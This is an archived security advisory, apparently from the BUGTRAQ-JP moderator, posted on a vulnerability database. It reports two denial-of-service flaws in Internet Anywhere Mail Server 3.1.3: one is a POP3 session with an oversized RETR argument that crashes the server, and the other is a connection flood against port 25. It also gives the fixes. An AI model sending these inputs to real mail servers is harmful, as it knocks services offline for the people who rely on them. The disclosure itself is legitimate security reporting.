Vulners
Lucene search
anywhere-3.1.3.txt
`
Hello,
I've reported DoS probrems on Internet Anywhere Mail Server Ver.3.1.3
to [email protected] on 3rd Dec,99. They started to develop the fix.
But they said "we'll release the fix in couple of weeks" three times.
I've discussed with Jeff Moll(President of True North Software, Inc.)
and he allowed me to post these vulnerabilities.
1. RETR DoS in POP service
+OK POP3 Welcome to somewhere.domain using the Internet Anywhere
Mail Server Version: 3.1.3. Build: 1065 by True North Software,
Inc.
USER yellow
+OK valid
PASS pikapika
+OK Authorized
RETR 111111111111111111111111
That's all. The Server could be dead at a little bit after
atoi(). They should check return value of atoi().
2. multiple connections to port 25 DoS
This is simple game, too.
Too much connect()s about 3000, then you will see connection
refused. After that, too much connect()s again about 800, then
you can't connect anymore.
It depends on memory size(I tested on 128MB RAM,total 256MB).
They should check connection status.
Moderator of BUGTRAQ-JP
<Nobuo Miwa> [email protected] ( @ @ ) http://www.lac.co.jp/security/
-------------------------------o00o--(. .)--o00o-------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Feb 2000 00:00Current
7.4High risk
Vulners AI Score7.4